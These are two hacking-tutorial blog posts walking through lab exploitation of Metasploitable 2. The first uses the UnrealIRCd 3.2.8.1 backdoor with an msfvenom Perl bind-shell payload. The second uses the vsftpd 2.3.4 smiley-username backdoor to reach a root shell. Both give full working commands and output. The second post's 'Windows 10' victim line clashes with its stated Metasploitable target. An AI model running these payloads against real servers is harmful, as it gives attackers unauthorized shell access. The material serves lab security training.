metalkey

Hacking tutorials + info

UnrealIRCD 3.2.8.1 Backdoor Command Execution

July 02, 2016 — metalkey
Attacker: Kali Linux
Victim: Metasploitable 2

Unreal IRCD 3.2.8.1 contains a backdoor that is triggered by entering AB; upon connecting. The backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.

The following example demonstrates it’s use on Metasploitable 2 (192.168.1.142).

Generating the Payload

We’re going to generate a unix bind shell with msfvenom (port 4444) and connect to this with Netcat.

root@kali:~$ msfvenom -p cmd/unix/bind_perl --payload-options
root@kali:~$ msfvenom -p cmd/unix/bind_perl LHOST=192.168.1.142
No platform was selected, choosing Msf::Module::Platform::Unix from the payload
No Arch selected, selecting Arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 240 bytes
perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(){if($_=~ /(.*)/){system $1;}};'

Triggering the Exploit

root@kali:~$ nc -vn 192.168.1.142 6667
(UNKNOWN) [192.168.1.142] 6667 (ircd) open
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
AB;perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(){if($_=~ /(.*)/){system $1;}};'
:irc.Metasploitable.LAN 451 AB;perl :You have not registered

Connecting to the Netcat Bind Shell

root@kali:~$ nc -vn 192.168.1.142 4444
(UNKNOWN) [192.168.1.142] 4444 (?) open
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/etc/unreal#

Tags: backdoors

VSFTPD v2.3.4 Backdoor Command Execution

July 02, 2016 — metalkey
Attacker: Kali Linux
Victim: Windows 10

VSFTPD v2.3.4 contains a backdoor that is triggered by entering anystring:) as the username (no password required). After the backdoor is triggered, the target machine opens a shell on port 6200.

This example demonstrates it’s use on Metasploitable 2 (192.168.1.142).

Triggering the Backdoor

root@kali:~$ ftp 192.168.1.142
Connected to 192.168.1.142.
220 (vsFTPd 2.3.4)
Name (192.168.1.142:root):123456:)
331 Please specify the password.
Password: [Enter]
[CTRL+C]
421 Service not available, remote server has closed connection

Connecting to the Shell

root@kali:~$ nc -vn 192.168.1.142 6200
(UNKNOWN) [192.168.1.142] 6200 (?) open
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/#

Tags: backdoors